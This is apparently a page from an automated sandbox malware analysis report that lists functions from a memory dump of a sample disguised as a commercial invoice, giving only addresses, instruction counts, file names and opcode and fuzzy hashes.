                                              • API String ID:
                                              • Opcode ID: ff8bbea2e3f08842cac1db2eab496ca52f68a6cf401d707b6d1e4a81773e65f2
                                              • Instruction ID: 189f5aa68c7fb7f58ef09f45a54a73d845b2e87a680b5e780aff42ebe1269095
                                              • Opcode Fuzzy Hash: ff8bbea2e3f08842cac1db2eab496ca52f68a6cf401d707b6d1e4a81773e65f2
                                              • Instruction Fuzzy Hash: 06519A71B1C71C4F9B58EE5CA8464BDB7E1EB99731F50023FE44AC3211EA21B85386C6
                                              Function 00007FF7C183274D Relevance: .2, Instructions: 207COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1335089076.00007FF7C1830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1830000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ff7c1830000_COMMERCIAL INVOICE - BL - AWB 7032805642.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 4a922a9d1287c34efcf1d51a38abae8dcba080173b4f830961e207e4908d2a38
                                              • Instruction ID: e22b63553ee8e0cb34b204dccb355fbcc6030782886332430837faa0bc8cd7e7
                                              • Opcode Fuzzy Hash: 4a922a9d1287c34efcf1d51a38abae8dcba080173b4f830961e207e4908d2a38
                                              • Instruction Fuzzy Hash: 8B51E331B0CD0A4FD794FF2C9868674B7D2FF9967175801BAE00EC72A2DE69AC428740
                                              Function 00007FF7C1833DD3 Relevance: .2, Instructions: 203COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1335089076.00007FF7C1830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1830000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ff7c1830000_COMMERCIAL INVOICE - BL - AWB 7032805642.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: c602b121e4733c817a5aa3a0e596f71d19c264071ffb666bb817bf83d87d0fd3
                                              • Instruction ID: 068a846b31ed0ca229f3cf20418dd8be4d4d006e6a67a475a7678b0d4fe0c717
                                              • Opcode Fuzzy Hash: c602b121e4733c817a5aa3a0e596f71d19c264071ffb666bb817bf83d87d0fd3
                                              • Instruction Fuzzy Hash: F651E362B0E9661BD7147BACBC157EAF780EF823B67888377D24DC6183CD54740682E5
                                              Function 00007FF7C1851AD8 Relevance: .2, Instructions: 197COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1335089076.00007FF7C1830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1830000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ff7c1830000_COMMERCIAL INVOICE - BL - AWB 7032805642.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 521b2e34d0216fca18f26aa42ba6229b3ff9314b2b946b52716c43dc8a42e8c4
                                              • Instruction ID: 48faaa7fb39feefc82dd2bea8e8798a9771c1339ed38ded2e4de7d0c468154b0
                                              • Opcode Fuzzy Hash: 521b2e34d0216fca18f26aa42ba6229b3ff9314b2b946b52716c43dc8a42e8c4
                                              • Instruction Fuzzy Hash: 86516B70718A498FDB98EF288495A65B3E1FF99325B50427EE44FC33A2DE35E842C740
                                              Function 00007FF7C18375AD Relevance: .2, Instructions: 188COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1335089076.00007FF7C1830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1830000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ff7c1830000_COMMERCIAL INVOICE - BL - AWB 7032805642.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: a98b9f23e2e9927cc02317aeac142dcfe0a24fa2332d3449a875af10f706f0b7
                                              • Instruction ID: f6f4f374c93d148745115968ae7e0fd7188ce2f6f4b24a8d417c6892ccbbb12f
                                              • Opcode Fuzzy Hash: a98b9f23e2e9927cc02317aeac142dcfe0a24fa2332d3449a875af10f706f0b7
                                              • Instruction Fuzzy Hash: A751F5A520E9C58FD3159B7CA8253E9FF60FF4736530843EBC0898B5A7CD24A91987C5
                                              Function 00007FF7C185B090 Relevance: .2, Instructions: 187COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1335089076.00007FF7C1830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1830000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ff7c1830000_COMMERCIAL INVOICE - BL - AWB 7032805642.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 4e8fd96632f8128dc3b50c86febb4fe77f42c46c41cfcb2e53014e7bd03a1da8
                                              • Instruction ID: fd1b0e75ae4508f74451b1da401e7c2d7f2fc113c306c08f69d14f8e1daf92e9
                                              • Opcode Fuzzy Hash: 4e8fd96632f8128dc3b50c86febb4fe77f42c46c41cfcb2e53014e7bd03a1da8
                                              • Instruction Fuzzy Hash: 65515C70A18F498FD758DB2884597A6B7E1FF68311F1086AED08FC3656DE34B506C781
                                              Function 00007FF7C1830FA6 Relevance: .2, Instructions: 177COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1335089076.00007FF7C1830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1830000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ff7c1830000_COMMERCIAL INVOICE - BL - AWB 7032805642.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: ae7ba56141e4847c085ab3a72d02082e3d294f722d5f91cf51a6a4b551d6c82f
                                              • Instruction ID: 9780ce3a5f40cb8a2358469ab6e4a84b60eacc2688e61b7acd13d80d4ddf8cfc
                                              • Opcode Fuzzy Hash: ae7ba56141e4847c085ab3a72d02082e3d294f722d5f91cf51a6a4b551d6c82f
                                              • Instruction Fuzzy Hash: 9551226050E7C20FE756AA7898A51BABFE1DF47A30B8D01FEC48ACB093C94D5C578361
                                              Function 00007FF7C18375C8 Relevance: .2, Instructions: 176COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1335089076.00007FF7C1830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1830000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ff7c1830000_COMMERCIAL INVOICE - BL - AWB 7032805642.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 87e6004428718fe831fcb542d6027877a05ba85f3373a84be9e1cdb00310df98
                                              • Instruction ID: bef5e9cd039cc723829d24b4d65ca13fa91025dcb373779c73fcdf3639ad61fb
                                              • Opcode Fuzzy Hash: 87e6004428718fe831fcb542d6027877a05ba85f3373a84be9e1cdb00310df98
                                              • Instruction Fuzzy Hash: 465105A520EAC58FD3199B7C68253E9FF60FF4736530843EBC089875A7CD24A81987C5
                                              Function 00007FF7C18334F5 Relevance: .2, Instructions: 175COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1335089076.00007FF7C1830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1830000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ff7c1830000_COMMERCIAL INVOICE - BL - AWB 7032805642.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 1b2ba36087018fd00940b04640f683cfba66bb27d04447ed21e926d80b0d2dc8
                                              • Instruction ID: 04d4f1a5ebf90609486493cf4eb4751fddfc916db21d9c039880a5f10b092420
                                              • Opcode Fuzzy Hash: 1b2ba36087018fd00940b04640f683cfba66bb27d04447ed21e926d80b0d2dc8
                                              • Instruction Fuzzy Hash: 7A41B670B1CA094FE758AE1C94522B9B7D2EF99770F54017EE44A83293DE64A82283D5
                                              Function 00007FF7C1851880 Relevance: .2, Instructions: 167COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1335089076.00007FF7C1830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1830000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ff7c1830000_COMMERCIAL INVOICE - BL - AWB 7032805642.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 2cb2b1cfc264d0a4b6e936d77f66deab83afbf7fb8de07cfedb84eea26b5b278
                                              • Instruction ID: 15108325ea56d87699f31e1e552a8fd1a3794ed125db1f723dca01d159b2e571
                                              • Opcode Fuzzy Hash: 2cb2b1cfc264d0a4b6e936d77f66deab83afbf7fb8de07cfedb84eea26b5b278
                                              • Instruction Fuzzy Hash: 0B41C13161CE0A8FEB64EF18C4906A6F3E2FF98364B54067AD44AC3655DE24F8168B90
                                              Function 00007FF7C183ABDA Relevance: .2, Instructions: 167COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1335089076.00007FF7C1830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1830000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ff7c1830000_COMMERCIAL INVOICE - BL - AWB 7032805642.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: ce203a79013f222a4314e28cfac48d72b92c6346d1cb458b97c44697530c0dab
                                              • Instruction ID: 1547d22c27467337a6ebc7c8382b1e0396b8945588990e00026569779d01fa5b
                                              • Opcode Fuzzy Hash: ce203a79013f222a4314e28cfac48d72b92c6346d1cb458b97c44697530c0dab
                                              • Instruction Fuzzy Hash: 4A51C361A0D7C54FD7479B3C58652A0BFE1EF5B220B8A41FBC089CB2A3D9686C178361
                                              Function 00007FF7C1838EF2 Relevance: .2, Instructions: 160COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1335089076.00007FF7C1830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1830000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ff7c1830000_COMMERCIAL INVOICE - BL - AWB 7032805642.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 073061f9e3e321263200e85f00fadedb73c91750549ac31a83910e9a25b3d4e1
                                              • Instruction ID: cbb0d5ba2c5145c407bcab8567ab81d9113086242abd41fa41f17c6ad540e288
                                              • Opcode Fuzzy Hash: 073061f9e3e321263200e85f00fadedb73c91750549ac31a83910e9a25b3d4e1
                                              • Instruction Fuzzy Hash: DA41F5B161999A5FC708FB2DA8956E6F3A0FF4536934443BBC04EC7283DE24B41687C0
                                              Function 00007FF7C185B1E0 Relevance: .2, Instructions: 154COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1335089076.00007FF7C1830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1830000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ff7c1830000_COMMERCIAL INVOICE - BL - AWB 7032805642.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 1ea07a0e3804f913736ba4894574c50444bf88aaba248f95c98875c668d07a7e
                                              • Instruction ID: cc127716fa5a26c79ede7fda436401a5d679e54a965b58bb8f552a2fcab23c8f
                                              • Opcode Fuzzy Hash: 1ea07a0e3804f913736ba4894574c50444bf88aaba248f95c98875c668d07a7e
                                              • Instruction Fuzzy Hash: FA51AF3190CF854FE764DB28C094B66F7D1FF49328F484BB8D48EC7591D6A8A899C390
                                              Function 00007FF7C18304DF Relevance: .2, Instructions: 152COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1335089076.00007FF7C1830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1830000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ff7c1830000_COMMERCIAL INVOICE - BL - AWB 7032805642.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 998826e3bf945c7affb6ebea984a918a3311443b1dbf6e6554ea0ef5a67bd285
                                              • Instruction ID: cddaa79dd43072e7f0faaa7de33b2a82669c79cdffeada13566ee12868567d38
                                              • Opcode Fuzzy Hash: 998826e3bf945c7affb6ebea984a918a3311443b1dbf6e6554ea0ef5a67bd285
                                              • Instruction Fuzzy Hash: 8241C731B1C9054FE759BA2CA4556BEB7D2EF89371B14027FE04ED3293DE2898424781
                                              Function 00007FF7C18304A8 Relevance: .2, Instructions: 150COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1335089076.00007FF7C1830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1830000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ff7c1830000_COMMERCIAL INVOICE - BL - AWB 7032805642.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 8e19126f142e61cd310cabfec19abb8e4cfaee6608c12a1a851b591d48ee7df4
                                              • Instruction ID: 92faec6a474f51ad92f8b29a7dcc6bfd5a9f10ceb477a435aa5d9e4e8c4f98e0
                                              • Opcode Fuzzy Hash: 8e19126f142e61cd310cabfec19abb8e4cfaee6608c12a1a851b591d48ee7df4
                                              • Instruction Fuzzy Hash: C1416671A0D9160BEB18AA68A4A62FEB3D1EF46B70B98117DD48E871C2DD586C5343A0
                                              Function 00007FF7C1831DB5 Relevance: .1, Instructions: 141COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1335089076.00007FF7C1830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1830000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ff7c1830000_COMMERCIAL INVOICE - BL - AWB 7032805642.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: be8f06948b03904432062625ba87aff4e960805525851b1025b337496b30b683
                                              • Instruction ID: b362c0aefc5a5706af8058e930079c5cc89e05fda6cffaa5072605b287366206
                                              • Opcode Fuzzy Hash: be8f06948b03904432062625ba87aff4e960805525851b1025b337496b30b683
                                              • Instruction Fuzzy Hash: 8E412771A0DA498FDB45DF2CC8556EDBBE1FF89320B4801AAD049D3293CA24AC12C7E1
                                              Function 00007FF7C18304C0 Relevance: .1, Instructions: 140COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1335089076.00007FF7C1830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1830000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ff7c1830000_COMMERCIAL INVOICE - BL - AWB 7032805642.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 69400b42f3503c37fef9019c0d2c23fd4c4240e50ce73fb16d827bdfaf705c91
                                              • Instruction ID: 6212e3f12c88e64a1d4ce6ca5204f996df84c1f5c6a07c7a6475e43f87ca52c6
                                              • Opcode Fuzzy Hash: 69400b42f3503c37fef9019c0d2c23fd4c4240e50ce73fb16d827bdfaf705c91
                                              • Instruction Fuzzy Hash: 7B415670A0D9160FEB18AA6894A62BEB7D1EF46B30BD8117DD48E871C5DD586C5383A0
                                              Function 00007FF7C18327A5 Relevance: .1, Instructions: 138COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1335089076.00007FF7C1830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1830000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ff7c1830000_COMMERCIAL INVOICE - BL - AWB 7032805642.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: bbb3e5caacdb59c7d6aa9ada185617711681ba274ffddf065f0f3209b0ae8a12
                                              • Instruction ID: 52c94c9ad3c27aacf36dc0cb740647799a93e2c911fb4573c849574a47833818
                                              • Opcode Fuzzy Hash: bbb3e5caacdb59c7d6aa9ada185617711681ba274ffddf065f0f3209b0ae8a12
                                              • Instruction Fuzzy Hash: 5931D43170DD094FE798FA2CA8197B9B7D1EF8A371B4402BAD44EC3293CD65B8528380
                                              Function 00007FF7C1830500 Relevance: .1, Instructions: 137COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1335089076.00007FF7C1830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1830000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ff7c1830000_COMMERCIAL INVOICE - BL - AWB 7032805642.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 36cb5b1878a8673b4a7ce8dfd59ae5571667c8ff06bd9e3c24e3d36a0dec5d4a
                                              • Instruction ID: e252dcf04f320d015f5ea8672d8b6864cbefe2b662df79fb4ce31bb181fb9d10
                                              • Opcode Fuzzy Hash: 36cb5b1878a8673b4a7ce8dfd59ae5571667c8ff06bd9e3c24e3d36a0dec5d4a
                                              • Instruction Fuzzy Hash: E431B231B1CD094FE759BA2C94566BEB6E2FF88371B54027EE04ED3293DE2898424781
                                              Function 00007FF7C1832B30 Relevance: .1, Instructions: 136COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1335089076.00007FF7C1830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1830000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ff7c1830000_COMMERCIAL INVOICE - BL - AWB 7032805642.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 1e9576c52ce31386acc02429a9f01b290d4275e082cce7758a5c16f9115d16ed
                                              • Instruction ID: cd57b45fb0e53f39c448ddc182d178ada90befa08d728f0b5c479a5f69be0765
                                              • Opcode Fuzzy Hash: 1e9576c52ce31386acc02429a9f01b290d4275e082cce7758a5c16f9115d16ed
                                              • Instruction Fuzzy Hash: A941923060CA188FDB48FF19D4419B9B7E1EF98330B94017DE44A832A2CE64F852CB95
                                              Function 00007FF7C1833340 Relevance: .1, Instructions: 131COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1335089076.00007FF7C1830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1830000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ff7c1830000_COMMERCIAL INVOICE - BL - AWB 7032805642.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 5f87ded0c1e04c87c76304f5f8e42fad3dd53cbea424cc7ff4d41b77e13601d9
                                              • Instruction ID: 00c33c76c16e06cf6ef3af70aaafb62e279e12357f943b1308c8f934daad9aa7
                                              • Opcode Fuzzy Hash: 5f87ded0c1e04c87c76304f5f8e42fad3dd53cbea424cc7ff4d41b77e13601d9
                                              • Instruction Fuzzy Hash: 5B311331A0CA514FE70CB76CA8866EAF7D0EF99365F44417FE08E82287CD64B8428385
                                              Function 00007FF7C1832DFD Relevance: .1, Instructions: 127COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1335089076.00007FF7C1830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1830000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ff7c1830000_COMMERCIAL INVOICE - BL - AWB 7032805642.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 5b0a0a955448d6fd605b75d6d241c5cebd45ea6682e0a05977a8fc81e98f1997
                                              • Instruction ID: 876d419b1b3f3b67d2d0b079a7db9578785f83c51bb4e9bed27e1acca135b323
                                              • Opcode Fuzzy Hash: 5b0a0a955448d6fd605b75d6d241c5cebd45ea6682e0a05977a8fc81e98f1997
                                              • Instruction Fuzzy Hash: 6B319321B4DC1A0BEB84F65CB8916B8F2D2EF88371B944276D40DC338ADD69B85643A1
                                              Function 00007FF7C1851E40 Relevance: .1, Instructions: 124COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1335089076.00007FF7C1830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1830000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ff7c1830000_COMMERCIAL INVOICE - BL - AWB 7032805642.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 32ff05c32711679ef25e3538722717c65195ab27f7709ed40dbce8bd004b1cd7
                                              • Instruction ID: 968974300b95b4982b5fff89197e1677b8eb597a441e84fe9807e7eb98bc8bd3
                                              • Opcode Fuzzy Hash: 32ff05c32711679ef25e3538722717c65195ab27f7709ed40dbce8bd004b1cd7
                                              • Instruction Fuzzy Hash: 15417F30A1CE068BEB64EF199454A62F7E2FF59320B844639D48AC3691DF64F891C750
                                              Function 00007FF7C1831638 Relevance: .1, Instructions: 122COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1335089076.00007FF7C1830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1830000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ff7c1830000_COMMERCIAL INVOICE - BL - AWB 7032805642.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 62352ca6c16c07f2f24a81a11404190e06e7ae94fbc789aec2b945e87eb6c65e
                                              • Instruction ID: 4d4d91dc762e39f53b198e9b27d7b7649a02e7f03174c578497def5d1e32fb5d
                                              • Opcode Fuzzy Hash: 62352ca6c16c07f2f24a81a11404190e06e7ae94fbc789aec2b945e87eb6c65e
                                              • Instruction Fuzzy Hash: 89311771A0C9498FDB44DF2C8855AEDFBE1FF89360B4401BAD049E3292CA25AC11C7A1
                                              Function 00007FF7C1831900 Relevance: .1, Instructions: 116COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1335089076.00007FF7C1830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1830000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ff7c1830000_COMMERCIAL INVOICE - BL - AWB 7032805642.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: ee9b1e2623e2377b61b5974c074f7dcb70d14cb68e64350ad764f1634d755d1f
                                              • Instruction ID: 4dc6cf25988bb0113856f6706749fae0e2ca6a6e82a8b690b14efa05f0cff48c
                                              • Opcode Fuzzy Hash: ee9b1e2623e2377b61b5974c074f7dcb70d14cb68e64350ad764f1634d755d1f
                                              • Instruction Fuzzy Hash: 89314772A0D7520BE305B76C78A53E5BBD0EF4237AF0842BBD58CC6183ED58B8458394
                                              Function 00007FF7C1836F6D Relevance: .1, Instructions: 114COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1335089076.00007FF7C1830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1830000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ff7c1830000_COMMERCIAL INVOICE - BL - AWB 7032805642.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 5d683eddb3f0c754ab1bfbbd5c15240995fb4cd1f3e16ddc906e4b6718c321f5
                                              • Instruction ID: e83ff11420dcf1942f14d5635ef0fdeee284806781bdf8143cdc7f9afe7a703a
                                              • Opcode Fuzzy Hash: 5d683eddb3f0c754ab1bfbbd5c15240995fb4cd1f3e16ddc906e4b6718c321f5
                                              • Instruction Fuzzy Hash: 1931D470A1DE864FC75DAB2998915A6B7A1FF5832030442BFD05FC36D7CE24B84AC781
                                              Function 00007FF7C1831F31 Relevance: .1, Instructions: 108COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1335089076.00007FF7C1830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1830000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ff7c1830000_COMMERCIAL INVOICE - BL - AWB 7032805642.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 0a6e43146293da67e5922e468fb42c8e5438a6992e1999882231176603790559
                                              • Instruction ID: 04dd5b68d0d8ae552e731af7c4aaa4ddb3a3322d3d1043e20943817ab098ebcd
                                              • Opcode Fuzzy Hash: 0a6e43146293da67e5922e468fb42c8e5438a6992e1999882231176603790559
                                              • Instruction Fuzzy Hash: 6D31386050E7869FD742AB7448222F8FFE1BF0233078941FAD149CB1D3DA5D2956C791
                                              Function 00007FF7C185E470 Relevance: .1, Instructions: 106COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1335089076.00007FF7C1830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1830000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ff7c1830000_COMMERCIAL INVOICE - BL - AWB 7032805642.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 198b0448f8a2de18975495888600e6f492b19a699e1411c3700f5aa69c8eaf7e
                                              • Instruction ID: 5ee49e57896e2e064a2673eb5c5bf2529255003217a9fd854370305c9e13c229
                                              • Opcode Fuzzy Hash: 198b0448f8a2de18975495888600e6f492b19a699e1411c3700f5aa69c8eaf7e
                                              • Instruction Fuzzy Hash: 84316B3061CE0A8FDBA4EF1DD484A62B3E1FF68320B904179D44EC3656DE64FC518B80
                                              Function 00007FF7C18333B0 Relevance: .1, Instructions: 106COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1335089076.00007FF7C1830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1830000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ff7c1830000_COMMERCIAL INVOICE - BL - AWB 7032805642.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 1fb29e960d21864af0efaa1e6d43b56bae8d781fd6c41c98c2da7de66cd0415d
                                              • Instruction ID: ca943e35d4879c23a307e6f65c2a681ad5560c14039d247fece860e3288ee744
                                              • Opcode Fuzzy Hash: 1fb29e960d21864af0efaa1e6d43b56bae8d781fd6c41c98c2da7de66cd0415d
                                              • Instruction Fuzzy Hash: 4821F071A1C9494FDF4CAA189886AF973D1EFA9350F00006EF84F83287DE34B8478385
                                              Function 00007FF7C1831697 Relevance: .1, Instructions: 97COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1335089076.00007FF7C1830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1830000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ff7c1830000_COMMERCIAL INVOICE - BL - AWB 7032805642.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: daa490f4d8bfb7207acd95c6e8b3790ca037ff562893852cd861eba389062300
                                              • Instruction ID: 91822049b35f8a37a30a8132073caf4cbc16c0f9e9cad05268a98d8b9f8276fe
                                              • Opcode Fuzzy Hash: daa490f4d8bfb7207acd95c6e8b3790ca037ff562893852cd861eba389062300
                                              • Instruction Fuzzy Hash: 3121623071CD084FD798EA1DD449A75B7E1FBA9321B50026EE44EC36A6DE61FC568780
                                              Function 00007FF7C1832A30 Relevance: .1, Instructions: 95COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1335089076.00007FF7C1830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1830000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ff7c1830000_COMMERCIAL INVOICE - BL - AWB 7032805642.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: daa1bf1ab8207dc34ba4963e6949a032e203bde2047321d6165fd3fc36af1ca7
                                              • Instruction ID: 836f122766137fb4c1becfc3fc5a7b89a3db7768a3606c850c362c5a4da71e4e
                                              • Opcode Fuzzy Hash: daa1bf1ab8207dc34ba4963e6949a032e203bde2047321d6165fd3fc36af1ca7
                                              • Instruction Fuzzy Hash: ED21A520B1CD074FFBA8AE5D6855775A3C3EF983B1B9441B6E40DC3295CD59EC5382A0
                                              Function 00007FF7C183433D Relevance: .1, Instructions: 94COMMON
                                              Download Yara Rule
                                              Memory Dump Source
